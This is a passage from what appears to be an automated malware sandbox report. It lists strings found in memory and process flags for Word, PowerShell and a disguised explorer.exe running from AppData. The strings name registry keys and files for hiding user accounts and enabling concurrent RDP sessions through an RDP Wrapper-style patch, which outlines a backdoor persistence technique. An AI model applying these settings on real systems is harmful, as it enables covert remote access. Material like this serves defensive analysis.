          Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
